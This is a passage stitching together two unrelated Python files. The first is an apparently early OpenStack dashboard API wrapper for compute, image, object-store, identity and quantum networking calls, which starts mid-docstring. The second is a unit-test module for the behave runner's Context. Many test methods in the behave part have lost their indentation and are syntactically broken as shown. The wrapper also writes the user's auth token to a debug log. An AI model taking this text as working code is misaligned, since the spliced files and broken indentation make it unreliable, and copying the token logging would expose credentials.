    hoisted into locals.
    """
    token = request.session['token']
    storage_url = url_for(request, 'object-store')
    LOG.debug('object store connection created using token "%s"'
              ' and url "%s"' % (token, storage_url))
    auth = SwiftAuthentication(storage_url, token)
    return cloudfiles.get_connection(auth=auth)
def quantum_api(request):
    """Build a quantum client; tenant comes from the request when present."""
    if hasattr(request, 'user'):
        tenant = request.user.tenant_id
    else:
        # No authenticated user on this request: fall back to the
        # statically configured tenant.
        tenant = settings.QUANTUM_TENANT
    return quantum_client.Client(settings.QUANTUM_URL, settings.QUANTUM_PORT,
                                 False, tenant, 'json')
def console_create(request, instance_id, kind='text'):
    # Create a console of the given kind ('text' by default).
    return Console(extras_api(request).consoles.create(instance_id, kind))


def flavor_create(request, name, memory, vcpu, disk, flavor_id):
    # TODO -- convert to novaclient when novaclient adds create support
    return Flavor(admin_api(request).flavors.create(
        name, int(memory), int(vcpu), int(disk), flavor_id))


def flavor_delete(request, flavor_id, purge=False):
    # TODO -- convert to novaclient when novaclient adds delete support
    admin_api(request).flavors.delete(flavor_id, purge)


def flavor_get(request, flavor_id):
    return Flavor(novaclient(request).flavors.get(flavor_id))


def flavor_list(request):
    return [Flavor(f) for f in novaclient(request).flavors.list()]
def tenant_floating_ip_list(request):
    """
    Fetches a list of all floating ips.
    """
    return [FloatingIp(ip) for ip in novaclient(request).floating_ips.list()]


# NOTE(review): unlike tenant_floating_ip_list, the functions below return
# raw novaclient objects rather than FloatingIp wrappers -- confirm whether
# this inconsistency is intentional.
def tenant_floating_ip_get(request, floating_ip_id):
    """
    Fetches a floating ip.
    """
    return novaclient(request).floating_ips.get(floating_ip_id)


def tenant_floating_ip_allocate(request):
    """
    Allocates a floating ip to tenant.
    """
    return novaclient(request).floating_ips.create()


def tenant_floating_ip_release(request, floating_ip_id):
    """
    Releases floating ip from the pool of a tenant.
    """
    return novaclient(request).floating_ips.delete(floating_ip_id)
def image_create(request, image_meta, image_file):
    return Image(glance_api(request).add_image(image_meta, image_file))


def image_delete(request, image_id):
    return glance_api(request).delete_image(image_id)


def image_get(request, image_id):
    # get_image returns a sequence; the first element is the image
    # metadata dict, which is what gets wrapped.
    return Image(glance_api(request).get_image(image_id)[0])


def image_list_detailed(request):
    return [Image(i) for i in glance_api(request).get_images_detailed()]


def snapshot_list_detailed(request):
    # Restrict the listing to snapshot images regardless of visibility.
    filters = {}
    filters['property-image_type'] = 'snapshot'
    filters['is_public'] = 'none'
    return [Image(i) for i in glance_api(request)
            .get_images_detailed(filters=filters)]


def snapshot_create(request, instance_id, name):
    return novaclient(request).servers.create_image(instance_id, name)
def image_update(request, image_id, image_meta=None):
    """Update image metadata; *image_meta* defaults to no changes."""
    # Replaces the old `x and x or {}` conditional idiom; plain `or`
    # is equivalent here (any falsy value maps to {}).
    image_meta = image_meta or {}
    return Image(glance_api(request).update_image(image_id,
                                                  image_meta=image_meta))
def keypair_create(request, name):
    return KeyPair(novaclient(request).keypairs.create(name))


def keypair_import(request, name, public_key):
    # Same create call, but with a caller-supplied public key.
    return KeyPair(novaclient(request).keypairs.create(name, public_key))


def keypair_delete(request, keypair_id):
    novaclient(request).keypairs.delete(keypair_id)


def keypair_list(request):
    return [KeyPair(key) for key in novaclient(request).keypairs.list()]
def server_create(request, name, image, flavor,
                  key_name, user_data, security_groups):
    return Server(novaclient(request).servers.create(
        name, image, flavor, userdata=user_data,
        security_groups=security_groups,
        key_name=key_name), request)


def server_delete(request, instance):
    compute_api(request).servers.delete(instance)


def server_get(request, instance_id):
    return Server(extras_api(request).servers.get(instance_id), request)


@check_openstackx
def server_list(request):
    return [Server(s, request) for s in extras_api(request).servers.list()]


@check_openstackx
def admin_server_list(request):
    # Uses the admin endpoint (see admin_api).
    return [Server(s, request) for s in admin_api(request).servers.list()]
def server_reboot(request,
                  instance_id,
                  hardness=openstack.compute.servers.REBOOT_HARD):
    # Hard reboot unless the caller asks otherwise.
    server = server_get(request, instance_id)
    server.reboot(hardness)


def server_update(request, instance_id, name, description):
    return extras_api(request).servers.update(instance_id,
                                              name=name,
                                              description=description)


def server_add_floating_ip(request, server, address):
    """
    Associates floating IP to server's fixed IP.
    """
    server = novaclient(request).servers.get(server)
    fip = novaclient(request).floating_ips.get(address)
    return novaclient(request).servers.add_floating_ip(server, fip)


def server_remove_floating_ip(request, server, address):
    """
    Removes relationship between floating and server's fixed ip.
    """
    fip = novaclient(request).floating_ips.get(address)
    # Resolve the server via the floating ip's current attachment.
    server = novaclient(request).servers.get(fip.instance_id)
    return novaclient(request).servers.remove_floating_ip(server, fip)
def service_get(request, name):
    return Services(admin_api(request).services.get(name))


@check_openstackx
def service_list(request):
    return [Services(s) for s in admin_api(request).services.list()]


def service_update(request, name, enabled):
    # Toggle a service's enabled/disabled state.
    return Services(admin_api(request).services.update(name, enabled))
def token_get_tenant(request, tenant_id):
    """Return the Tenant with *tenant_id* among those visible to the
    user's token, or None (with a warning logged) when not found."""
    tenants = auth_api().tenants.for_token(request.user.token)
    for t in tenants:
        if str(t.id) == str(tenant_id):
            return Tenant(t)
    LOG.warning('Unknown tenant id "%s" requested' % tenant_id)


def token_list_tenants(request, token):
    # NOTE: `request` is unused; kept for signature consistency.
    return [Tenant(t) for t in auth_api().tenants.for_token(token)]


def tenant_create(request, tenant_name, description, enabled):
    return Tenant(account_api(request).tenants.create(tenant_name,
                                                      description,
                                                      enabled))


def tenant_get(request, tenant_id):
    return Tenant(account_api(request).tenants.get(tenant_id))


@check_openstackx
def tenant_list(request):
    return [Tenant(t) for t in account_api(request).tenants.list()]


def tenant_list_for_token(request, token):
    # FIXME: use novaclient for this
    keystone = openstackx.auth.Auth(
        management_url=settings.OPENSTACK_KEYSTONE_URL)
    return [Tenant(t) for t in keystone.tenants.for_token(token)]


def users_list_for_token_and_tenant(request, token, tenant):
    # Admin identity endpoint, authenticated with the supplied token.
    admin_account = openstackx.extras.Account(
        auth_token=token,
        management_url=settings.OPENSTACK_KEYSTONE_ADMIN_URL)
    return [User(u) for u in admin_account.users.get_for_tenant(tenant)]


def tenant_update(request, tenant_id, tenant_name, description, enabled):
    return Tenant(account_api(request).tenants.update(tenant_id,
                                                      tenant_name,
                                                      description,
                                                      enabled))
def token_create(request, tenant, username, password):
    '''
    Creates a token using the username and password provided. If tenant
    is provided it will retrieve a scoped token and the service catalog for
    the given tenant. Otherwise it will return an unscoped token and without
    a service catalog.
    '''
    c = base_nova_client.HTTPClient(username, password, tenant,
                                    settings.OPENSTACK_KEYSTONE_URL)
    # Pin the keystone API version used for the auth call.
    c.version = 'v2.0'
    c.authenticate()
    access = c.service_catalog.catalog['access']
    return Token(id=c.auth_token,
                 serviceCatalog=access.get('serviceCatalog', None),
                 user=access['user'],
                 tenant_id=tenant)


def token_create_scoped(request, tenant, token):
    '''
    Creates a scoped token using the tenant id and unscoped token; retrieves
    the service catalog for the given tenant.
    '''
    # _get_base_client_from_token authenticates via the token itself.
    c = _get_base_client_from_token(tenant, token)
    access = c.service_catalog.catalog['access']
    return Token(id=c.auth_token,
                 serviceCatalog=access.get('serviceCatalog', None),
                 user=access['user'],
                 tenant_id=tenant)
def tenant_quota_get(request, tenant):
    return novaclient(request).quotas.get(tenant)


@check_openstackx
def usage_get(request, tenant_id, start, end):
    return Usage(extras_api(request).usage.get(tenant_id, start, end))


@check_openstackx
def usage_list(request, start, end):
    return [Usage(u) for u in extras_api(request).usage.list(start, end)]


def user_create(request, user_id, email, password, tenant_id, enabled):
    return User(account_api(request).users.create(
        user_id, email, password, tenant_id, enabled))


def user_delete(request, user_id):
    account_api(request).users.delete(user_id)


def user_get(request, user_id):
    return User(account_api(request).users.get(user_id))
def security_group_list(request):
    return [SecurityGroup(g) for g in
            novaclient(request).security_groups.list()]


def security_group_get(request, security_group_id):
    return SecurityGroup(
        novaclient(request).security_groups.get(security_group_id))


def security_group_create(request, name, description):
    return SecurityGroup(
        novaclient(request).security_groups.create(name, description))


def security_group_delete(request, security_group_id):
    novaclient(request).security_groups.delete(security_group_id)


def security_group_rule_create(request, parent_group_id, ip_protocol=None,
                               from_port=None, to_port=None, cidr=None,
                               group_id=None):
    # NOTE(review): the created *rule* is wrapped in SecurityGroup, whose
    # _attrs do not match a rule's fields -- confirm whether this should
    # be SecurityGroupRule instead.
    return SecurityGroup(
        novaclient(request).security_group_rules.create(parent_group_id,
                                                        ip_protocol,
                                                        from_port,
                                                        to_port,
                                                        cidr,
                                                        group_id))


def security_group_rule_delete(request, security_group_rule_id):
    novaclient(request).security_group_rules.delete(security_group_rule_id)
@check_openstackx
def user_list(request):
    return [User(u) for u in account_api(request).users.list()]


def user_update_email(request, user_id, email):
    return User(account_api(request).users.update_email(user_id, email))


def user_update_enabled(request, user_id, enabled):
    return User(account_api(request).users.update_enabled(user_id, enabled))


def user_update_password(request, user_id, password):
    return User(account_api(request).users.update_password(user_id, password))


def user_update_tenant(request, user_id, tenant_id):
    return User(account_api(request).users.update_tenant(user_id, tenant_id))
def _get_role(request, name):
    """Return the role whose name matches *name* (case-insensitive).

    Raises Exception when no such role exists.
    """
    wanted = name.lower()
    for candidate in account_api(request).roles.list():
        if candidate.name.lower() == wanted:
            return candidate
    raise Exception('Role does not exist: %s' % name)
def role_add_for_tenant_user(request, tenant_id, user_id, role_name):
    # Resolve the role name to its id first; raises if unknown.
    role = _get_role(request, role_name)
    account_api(request).role_refs.add_for_tenant_user(
        tenant_id,
        user_id,
        role.id)


def role_delete_for_tenant_user(request, tenant_id, user_id, role_name):
    role = _get_role(request, role_name)
    account_api(request).role_refs.delete_for_tenant_user(
        tenant_id,
        user_id,
        role.id)
def swift_container_exists(request, container_name):
    # EAFP: probe the container and translate the error into a bool.
    try:
        swift_api(request).get_container(container_name)
        return True
    except cloudfiles.errors.NoSuchContainer:
        return False


def swift_object_exists(request, container_name, object_name):
    # Missing container propagates as NoSuchContainer; only a missing
    # object maps to False here.
    container = swift_api(request).get_container(container_name)
    try:
        container.get_object(object_name)
        return True
    except cloudfiles.errors.NoSuchObject:
        return False
def swift_get_containers(request):
    return [Container(c) for c in swift_api(request).get_all_containers()]


def swift_create_container(request, name):
    # Refuse to recreate an existing container.
    if swift_container_exists(request, name):
        raise Exception('Container with name %s already exists.' % (name))
    return Container(swift_api(request).create_container(name))


def swift_delete_container(request, name):
    swift_api(request).delete_container(name)


def swift_get_objects(request, container_name, prefix=None):
    container = swift_api(request).get_container(container_name)
    return [SwiftObject(o) for o in container.get_objects(prefix=prefix)]
def swift_copy_object(request, orig_container_name, orig_object_name,
                      new_container_name, new_object_name):
    """Copy an object between containers, refusing to overwrite an
    existing destination object."""
    container = swift_api(request).get_container(orig_container_name)
    # Dropped the redundant `== True`; the helper already returns a bool.
    if swift_object_exists(request, new_container_name, new_object_name):
        raise Exception('Object with name %s already exists in container %s'
                        % (new_object_name, new_container_name))
    orig_obj = container.get_object(orig_object_name)
    return orig_obj.copy_to(new_container_name, new_object_name)
def swift_upload_object(request, container_name, object_name, object_data):
    container = swift_api(request).get_container(container_name)
    obj = container.create_object(object_name)
    obj.write(object_data)


def swift_delete_object(request, container_name, object_name):
    container = swift_api(request).get_container(container_name)
    container.delete_object(object_name)


def swift_get_object_data(request, container_name, object_name):
    # NOTE: returns the object's stream() result rather than raw bytes;
    # the caller iterates the body.
    container = swift_api(request).get_container(container_name)
    return container.get_object(object_name).stream()
# -- Thin pass-throughs to the quantum client API. --
def quantum_list_networks(request):
    return quantum_api(request).list_networks()


def quantum_network_details(request, network_id):
    return quantum_api(request).show_network_details(network_id)


def quantum_list_ports(request, network_id):
    return quantum_api(request).list_ports(network_id)


def quantum_port_details(request, network_id, port_id):
    return quantum_api(request).show_port_details(network_id, port_id)


def quantum_create_network(request, data):
    return quantum_api(request).create_network(data)


def quantum_delete_network(request, network_id):
    return quantum_api(request).delete_network(network_id)


def quantum_update_network(request, network_id, data):
    return quantum_api(request).update_network(network_id, data)


def quantum_create_port(request, network_id):
    return quantum_api(request).create_port(network_id)


def quantum_delete_port(request, network_id, port_id):
    return quantum_api(request).delete_port(network_id, port_id)


def quantum_attach_port(request, network_id, port_id, data):
    return quantum_api(request).attach_resource(network_id, port_id, data)


def quantum_detach_port(request, network_id, port_id):
    return quantum_api(request).detach_resource(network_id, port_id)


def quantum_set_port_state(request, network_id, port_id, data):
    return quantum_api(request).set_port_state(network_id, port_id, data)


def quantum_port_attachment(request, network_id, port_id):
    return quantum_api(request).show_port_attachment(network_id, port_id)
def get_vif_ids(request):
    """List every instance's virtual interfaces, flagging attachment.

    Returns a list of dicts with keys: 'id', 'instance', 'instance_name'
    and 'available' (False when the VIF is already attached to a port).
    """
    vifs = []
    attached_vifs = []
    # Collect the attachment ids from every port on every network.
    networks_list = quantum_api(request).list_networks()
    for network in networks_list['networks']:
        ports = quantum_api(request).list_ports(network['id'])
        for port in ports['ports']:
            port_attachment = quantum_api(request).show_port_attachment(
                network['id'],
                port['id'])
            if port_attachment['attachment']:
                attached_vifs.append(
                    port_attachment['attachment']['id'].encode('ascii'))
    # Cross-reference each instance's VIFs against the attached set.
    instances = server_list(request)
    for instance in instances:
        instance_vifs = extras_api(request).virtual_interfaces.list(
            instance.id)
        for vif in instance_vifs:
            # The original duplicated the whole dict in an if/else that
            # differed only in 'available'; compute it directly instead.
            vifs.append({
                'id': vif.id,
                'instance': instance.id,
                'instance_name': instance.name,
                'available': str(vif.id) not in attached_vifs,
            })
    return vifs
class GlobalSummary(object):
    """Aggregates cloud-wide capacity and usage totals.

    Totals accumulate into ``self.summary`` under keys of the form
    'total_<info><rsrc>', where <info> is '', 'active_' or 'avail_'.
    """
    node_resources = ['vcpus', 'disk_size', 'ram_size']
    unit_mem_size = {'disk_size': ['GiB', 'TiB'], 'ram_size': ['MiB', 'GiB']}
    node_resource_info = ['', 'active_', 'avail_']

    def __init__(self, request):
        self.summary = {}
        # Seed every total_* counter with zero.
        for rsrc in GlobalSummary.node_resources:
            for info in GlobalSummary.node_resource_info:
                self.summary['total_' + info + rsrc] = 0
        self.request = request
        self.service_list = []
        self.usage_list = []

    def service(self):
        """Accumulate capacity totals from the nova-compute services."""
        try:
            self.service_list = service_list(self.request)
        # `except E as e` (py2.6+) replaces the py3-incompatible comma form.
        except api_exceptions.ApiException as e:
            self.service_list = []
            LOG.exception('ApiException fetching service list in instance usage')
            messages.error(self.request,
                           'Unable to get service info: %s' % e.message)
            return
        for service in self.service_list:
            if service.type == 'nova-compute':
                self.summary['total_vcpus'] += min(
                    service.stats['max_vcpus'],
                    service.stats.get('vcpus', 0))
                self.summary['total_disk_size'] += min(
                    service.stats['max_gigabytes'],
                    service.stats.get('local_gb', 0))
                # Rewritten from a hard-to-read inline conditional:
                # cap at max_ram when the stat is reported.
                if 'max_ram' in service.stats:
                    ram = min(service.stats['max_ram'],
                              service.stats['memory_mb'])
                else:
                    ram = service.stats.get('memory_mb', 0)
                self.summary['total_ram_size'] += ram

    def usage(self, datetime_start, datetime_end):
        """Accumulate numeric usage fields over the given date range."""
        try:
            self.usage_list = usage_list(self.request, datetime_start,
                                         datetime_end)
        except api_exceptions.ApiException as e:
            self.usage_list = []
            LOG.exception('ApiException fetching usage list in instance usage'
                          ' on date range "%s to %s"' % (datetime_start,
                                                         datetime_end))
            messages.error(self.request,
                           'Unable to get usage info: %s' % e.message)
            return
        for usage in self.usage_list:
            # FIXME: api needs a simpler dict interface (with iteration)
            # - anthony
            # NOTE(mgius): Changed this on the api end.  Not too much
            # neater, but at least its not going into private member
            # data of an external class anymore
            for k in usage._attrs:
                v = usage.__getattr__(k)
                # Exact type check on purpose: bools and other numeric
                # subclasses are excluded, matching the original logic.
                if type(v) in (float, int):
                    if k not in self.summary:
                        self.summary[k] = 0
                    self.summary[k] += v

    def human_readable(self, rsrc):
        """Add 'unit_<rsrc>' and 'total_*<rsrc>_hr' entries to summary."""
        if self.summary['total_' + rsrc] > 1023:
            self.summary['unit_' + rsrc] = GlobalSummary.unit_mem_size[rsrc][1]
            mult = 1024.0
        else:
            self.summary['unit_' + rsrc] = GlobalSummary.unit_mem_size[rsrc][0]
            mult = 1.0
        for kind in GlobalSummary.node_resource_info:
            self.summary['total_' + kind + rsrc + '_hr'] = \
                self.summary['total_' + kind + rsrc] / mult

    def avail(self):
        """Derive 'total_avail_<rsrc>' = total - active for each resource."""
        for rsrc in GlobalSummary.node_resources:
            self.summary['total_avail_' + rsrc] = \
                self.summary['total_' + rsrc] - \
                self.summary['total_active_' + rsrc]
| |
# -*- coding: UTF-8 -*-
# pylint: disable=too-many-lines, line-too-long
from __future__ import absolute_import, print_function, with_statement
from collections import defaultdict
from platform import python_implementation
import os.path
import sys
import warnings
import tempfile
import unittest
import six
from six import StringIO
from mock import Mock, patch
from nose.tools import * # pylint: disable=wildcard-import, unused-wildcard-import
from behave.model import Table
from behave.step_registry import StepRegistry
from behave import parser, runner
from behave.configuration import ConfigError
from behave.formatter.base import StreamOpener
# -- CONVENIENCE-ALIAS:
_text = six.text_type
class TestContext(unittest.TestCase):
# pylint: disable=invalid-name, protected-access, no-self-use
def setUp(self):
r = Mock()
self.config = r.config = Mock()
r.config.verbose = False
self.context = runner.Context(r)
    def test_user_mode_shall_restore_behave_mode(self):
        # -- CASE: No exception is raised.
        initial_mode = runner.Context.BEHAVE
        eq_(self.context._mode, initial_mode)
        with self.context.user_mode():
            eq_(self.context._mode, runner.Context.USER)
            self.context.thing = "stuff"
        # Mode must be restored once the context manager exits.
        eq_(self.context._mode, initial_mode)
def test_user_mode_shall_restore_behave_mode_if_assert_fails(self):
initial_mode = runner.Context.BEHAVE
eq_(self.context._mode, initial_mode)
try:
with self.context.user_mode():
eq_(self.context._mode, runner.Context.USER)
assert False, "XFAIL"
except AssertionError:
eq_(self.context._mode, initial_mode)
def test_user_mode_shall_restore_behave_mode_if_exception_is_raised(self):
initial_mode = runner.Context.BEHAVE
eq_(self.context._mode, initial_mode)
try:
with self.context.user_mode():
eq_(self.context._mode, runner.Context.USER)
raise RuntimeError("XFAIL")
except RuntimeError:
eq_(self.context._mode, initial_mode)
    def test_use_with_user_mode__shall_restore_initial_mode(self):
        # -- CASE: No exception is raised.
        # pylint: disable=protected-access
        initial_mode = runner.Context.BEHAVE
        self.context._mode = initial_mode
        with self.context.use_with_user_mode():
            eq_(self.context._mode, runner.Context.USER)
            self.context.thing = "stuff"
        # Mode must be restored when the with-block exits.
        eq_(self.context._mode, initial_mode)
def test_use_with_user_mode__shall_restore_initial_mode_with_error(self):
# -- CASE: Exception is raised.
# pylint: disable=protected-access
initial_mode = runner.Context.BEHAVE
self.context._mode = initial_mode
try:
with self.context.use_with_user_mode():
eq_(self.context._mode, runner.Context.USER)
raise RuntimeError("XFAIL")
except RuntimeError:
eq_(self.context._mode, initial_mode)
    def test_use_with_behave_mode__shall_restore_initial_mode(self):
        # -- CASE: No exception is raised.
        # pylint: disable=protected-access
        initial_mode = runner.Context.USER
        self.context._mode = initial_mode
        with self.context._use_with_behave_mode():
            eq_(self.context._mode, runner.Context.BEHAVE)
            self.context.thing = "stuff"
        # Mode must be restored when the with-block exits.
        eq_(self.context._mode, initial_mode)
def test_use_with_behave_mode__shall_restore_initial_mode_with_error(self):
# -- CASE: Exception is raised.
# pylint: disable=protected-access
initial_mode = runner.Context.USER
self.context._mode = initial_mode
try:
with self.context._use_with_behave_mode():
eq_(self.context._mode, runner.Context.BEHAVE)
raise RuntimeError("XFAIL")
except RuntimeError:
eq_(self.context._mode, initial_mode)
    def test_context_contains(self):
        # `in` reflects attributes stored on any frame of the context.
        eq_("thing" in self.context, False)
        self.context.thing = "stuff"
        eq_("thing" in self.context, True)
        self.context._push()
        # Still visible after pushing a new frame.
        eq_("thing" in self.context, True)

    def test_attribute_set_at_upper_level_visible_at_lower_level(self):
        self.context.thing = "stuff"
        self.context._push()
        eq_(self.context.thing, "stuff")

    def test_attribute_set_at_lower_level_not_visible_at_upper_level(self):
        self.context._push()
        self.context.thing = "stuff"
        self.context._pop()
        # The popped frame's attribute must be gone again.
        assert getattr(self.context, "thing", None) is None
    def test_attributes_set_at_upper_level_visible_at_lower_level(self):
        # Attributes accumulate as frames are pushed.
        self.context.thing = "stuff"
        self.context._push()
        eq_(self.context.thing, "stuff")
        self.context.other_thing = "more stuff"
        self.context._push()
        eq_(self.context.thing, "stuff")
        eq_(self.context.other_thing, "more stuff")
        self.context.third_thing = "wombats"
        self.context._push()
        eq_(self.context.thing, "stuff")
        eq_(self.context.other_thing, "more stuff")
        eq_(self.context.third_thing, "wombats")

    def test_attributes_set_at_lower_level_not_visible_at_upper_level(self):
        # Each _pop() must discard exactly the attributes set on that frame.
        self.context.thing = "stuff"
        self.context._push()
        self.context.other_thing = "more stuff"
        self.context._push()
        self.context.third_thing = "wombats"
        eq_(self.context.thing, "stuff")
        eq_(self.context.other_thing, "more stuff")
        eq_(self.context.third_thing, "wombats")
        self.context._pop()
        eq_(self.context.thing, "stuff")
        eq_(self.context.other_thing, "more stuff")
        assert getattr(self.context, "third_thing", None) is None, "%s is not None" % self.context.third_thing
        self.context._pop()
        eq_(self.context.thing, "stuff")
        assert getattr(self.context, "other_thing", None) is None, "%s is not None" % self.context.other_thing
        assert getattr(self.context, "third_thing", None) is None, "%s is not None" % self.context.third_thing
    def test_masking_existing_user_attribute_when_verbose_causes_warning(self):
        """Re-assigning a user attribute in a deeper frame warns when verbose."""
        warns = []
        # Capture warnings by swapping the global warnings hook; restored below.
        def catch_warning(*args, **kwargs):
            warns.append(args[0])
        old_showwarning = warnings.showwarning
        warnings.showwarning = catch_warning
        # pylint: disable=protected-access
        self.config.verbose = True
        with self.context.use_with_user_mode():
            self.context.thing = "stuff"
            self.context._push()
            self.context.thing = "other stuff"
        warnings.showwarning = old_showwarning
        print(repr(warns))
        assert warns, "warns is empty!"
        warning = warns[0]
        assert isinstance(warning, runner.ContextMaskWarning), "warning is not a ContextMaskWarning"
        info = warning.args[0]
        # The warning message identifies the origin ("user code"), the masked
        # attribute name, and points the user at the tutorial.
        assert info.startswith("user code"), "%r doesn't start with 'user code'" % info
        assert "'thing'" in info, "%r not in %r" % ("'thing'", info)
        assert "tutorial" in info, '"tutorial" not in %r' % (info, )
    def test_masking_existing_user_attribute_when_not_verbose_causes_no_warning(self):
        """No mask warning is emitted when config.verbose is off."""
        warns = []
        # Capture warnings by swapping the global warnings hook; restored below.
        def catch_warning(*args, **kwargs):
            warns.append(args[0])
        old_showwarning = warnings.showwarning
        warnings.showwarning = catch_warning
        # explicit
        # pylint: disable=protected-access
        self.config.verbose = False
        with self.context.use_with_user_mode():
            self.context.thing = "stuff"
            self.context._push()
            self.context.thing = "other stuff"
        warnings.showwarning = old_showwarning
        assert not warns
    def test_behave_masking_user_attribute_causes_warning(self):
        """A behave-mode write that masks a user-mode value always warns."""
        warns = []
        # Capture warnings by swapping the global warnings hook; restored below.
        def catch_warning(*args, **kwargs):
            warns.append(args[0])
        old_showwarning = warnings.showwarning
        warnings.showwarning = catch_warning
        with self.context.use_with_user_mode():
            self.context.thing = "stuff"
        # -- Outside the user-mode block: writes happen in behave-runner mode.
        # pylint: disable=protected-access
        self.context._push()
        self.context.thing = "other stuff"
        warnings.showwarning = old_showwarning
        print(repr(warns))
        assert warns, "OOPS: warns is empty, but expected non-empty"
        warning = warns[0]
        assert isinstance(warning, runner.ContextMaskWarning), "warning is not a ContextMaskWarning"
        info = warning.args[0]
        assert info.startswith("behave runner"), "%r doesn't start with 'behave runner'" % info
        assert "'thing'" in info, "%r not in %r" % ("'thing'", info)
        # Jython compiles this module to "<name>$py.class"; normalize so the
        # filename embedded in the warning message still matches.
        filename = __file__.rsplit(".", 1)[0]
        if python_implementation() == "Jython":
            filename = filename.replace("$py", ".py")
        assert filename in info, "%r not in %r" % (filename, info)
    def test_setting_root_attribute_that_masks_existing_causes_warning(self):
        """Setting a root attribute that masks a user value emits a warning."""
        # pylint: disable=protected-access
        warns = []
        # Capture warnings by swapping the global warnings hook; restored below.
        def catch_warning(*args, **kwargs):
            warns.append(args[0])
        old_showwarning = warnings.showwarning
        warnings.showwarning = catch_warning
        with self.context.use_with_user_mode():
            self.context._push()
            self.context.thing = "teak"
        self.context._set_root_attribute("thing", "oak")
        warnings.showwarning = old_showwarning
        print(repr(warns))
        assert warns
        warning = warns[0]
        assert isinstance(warning, runner.ContextMaskWarning)
        info = warning.args[0]
        assert info.startswith("behave runner"), "%r doesn't start with 'behave runner'" % info
        assert "'thing'" in info, "%r not in %r" % ("'thing'", info)
        # Jython compiles this module to "<name>$py.class"; normalize so the
        # filename embedded in the warning message still matches.
        filename = __file__.rsplit(".", 1)[0]
        if python_implementation() == "Jython":
            filename = filename.replace("$py", ".py")
        assert filename in info, "%r not in %r" % (filename, info)
def test_context_deletable(self):
eq_("thing" in self.context, False)
self.context.thing = "stuff"
eq_("thing" in self.context, True)
del self.context.thing
eq_("thing" in self.context, False)
@raises(AttributeError)
def test_context_deletable_raises(self):
# pylint: disable=protected-access
eq_("thing" in self.context, False)
self.context.thing = "stuff"
eq_("thing" in self.context, True)
self.context._push()
eq_("thing" in self.context, True)
del self.context.thing
class ExampleSteps(object):
    """Sample step implementations used by the execute_steps() tests.

    The class attributes ``text`` and ``table`` record what the multi-line
    text / table steps received, so tests can assert on them afterwards.
    """
    text = None
    table = None

    @staticmethod
    def step_passes(context):   # pylint: disable=unused-argument
        """A step that always succeeds."""
        pass

    @staticmethod
    def step_fails(context):    # pylint: disable=unused-argument
        """A step that always fails with an AssertionError."""
        assert False, "XFAIL"

    @classmethod
    def step_with_text(cls, context):
        """Record the multi-line text attached to the step."""
        assert context.text is not None, "REQUIRE: multi-line text"
        cls.text = context.text

    @classmethod
    def step_with_table(cls, context):
        """Record the table attached to the step."""
        assert context.table, "REQUIRE: table"
        cls.table = context.table

    @classmethod
    def register_steps_with(cls, step_registry):
        """Register all example steps with the given step registry."""
        # pylint: disable=bad-whitespace
        for keyword, pattern, func in (
                ("step", "a step passes", cls.step_passes),
                ("step", "a step fails", cls.step_fails),
                ("step", "a step with text", cls.step_with_text),
                ("step", "a step with a table", cls.step_with_table)):
            step_registry.add_step_definition(keyword, pattern, func)
class TestContext_ExecuteSteps(unittest.TestCase):
    """
    Test the behave.runner.Context.execute_steps() functionality.
    """
    # pylint: disable=invalid-name, no-self-use
    # Shared across test methods; created lazily in setUp().
    step_registry = None

    def setUp(self):
        # Build a fresh Context wired to a mocked runner.  The step registry
        # is created and populated only once, then reused.
        if not self.step_registry:
            # -- SETUP ONCE:
            self.step_registry = StepRegistry()
            ExampleSteps.register_steps_with(self.step_registry)
        ExampleSteps.text = None
        ExampleSteps.table = None
        runner_ = Mock()
        self.config = runner_.config = Mock()
        runner_.config.verbose = False
        runner_.config.stdout_capture = False
        runner_.config.stderr_capture = False
        runner_.config.log_capture = False
        runner_.step_registry = self.step_registry
        self.context = runner.Context(runner_)
        runner_.context = self.context
        self.context.feature = Mock()
        self.context.feature.parser = parser.Parser()
        self.context.runner = runner_
        # self.context.text = None
        # self.context.table = None

    def test_execute_steps_with_simple_steps(self):
        doc = u"""
Given a step passes
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            result = self.context.execute_steps(doc)
            eq_(result, True)

    def test_execute_steps_with_failing_step(self):
        doc = u"""
Given a step passes
When a step fails
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            # NOTE(review): if execute_steps() does NOT raise, no assertion
            # runs at all — the failure case is only checked when it occurs.
            try:
                result = self.context.execute_steps(doc)
            except AssertionError as e:
                ok_("FAILED SUB-STEP: When a step fails" in _text(e))

    def test_execute_steps_with_undefined_step(self):
        doc = u"""
Given a step passes
When a step is undefined
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            # NOTE(review): same caveat as above — only asserts when raised.
            try:
                result = self.context.execute_steps(doc)
            except AssertionError as e:
                ok_("UNDEFINED SUB-STEP: When a step is undefined" in _text(e))

    def test_execute_steps_with_text(self):
        doc = u'''
Given a step passes
When a step with text:
    """
    Lorem ipsum
    Ipsum lorem
    """
Then a step passes
'''.lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            result = self.context.execute_steps(doc)
            # The parser strips the doc-string indentation.
            expected_text = "Lorem ipsum\nIpsum lorem"
            eq_(result, True)
            eq_(expected_text, ExampleSteps.text)

    def test_execute_steps_with_table(self):
        doc = u"""
Given a step with a table:
    | Name | Age |
    | Alice | 12 |
    | Bob | 23 |
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            # pylint: disable=bad-whitespace, bad-continuation
            result = self.context.execute_steps(doc)
            expected_table = Table([u"Name", u"Age"], 0, [
                [u"Alice", u"12"],
                [u"Bob", u"23"],
            ])
            eq_(result, True)
            eq_(expected_table, ExampleSteps.table)

    def test_context_table_is_restored_after_execute_steps_without_table(self):
        doc = u"""
Given a step passes
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            original_table = "<ORIGINAL_TABLE>"
            self.context.table = original_table
            self.context.execute_steps(doc)
            eq_(self.context.table, original_table)

    def test_context_table_is_restored_after_execute_steps_with_table(self):
        doc = u"""
Given a step with a table:
    | Name | Age |
    | Alice | 12 |
    | Bob | 23 |
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            original_table = "<ORIGINAL_TABLE>"
            self.context.table = original_table
            self.context.execute_steps(doc)
            eq_(self.context.table, original_table)

    def test_context_text_is_restored_after_execute_steps_without_text(self):
        doc = u"""
Given a step passes
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            original_text = "<ORIGINAL_TEXT>"
            self.context.text = original_text
            self.context.execute_steps(doc)
            eq_(self.context.text, original_text)

